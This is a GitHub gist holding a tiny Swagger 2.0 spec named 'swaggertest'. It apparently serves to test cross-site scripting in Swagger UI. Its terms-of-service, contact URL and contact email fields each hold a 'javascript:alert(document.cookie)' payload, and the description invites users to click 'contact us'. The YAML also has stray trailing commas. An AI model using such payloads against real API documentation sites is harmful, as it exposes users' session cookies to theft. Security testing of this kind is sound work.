Skip to content

Instantly share code, notes, and snippets.

@ashishmgupta
Last active February 10, 2023 15:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ashishmgupta/1179287a2eb9e3bc34219e6cf7caf6b4 to your computer and use it in GitHub Desktop.
Save ashishmgupta/1179287a2eb9e3bc34219e6cf7caf6b4 to your computer and use it in GitHub Desktop.
swaggertest
swagger: "2.0",
info:
title: "Swagger Test App",
description: "Click contact us"
termsOfService: "javascript:alert(document.cookie)"
contact:
name: "API Support",
url: "javascript:alert(document.cookie)",
email: "javascript:alert(document.cookie)"
version: "2.0.1"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment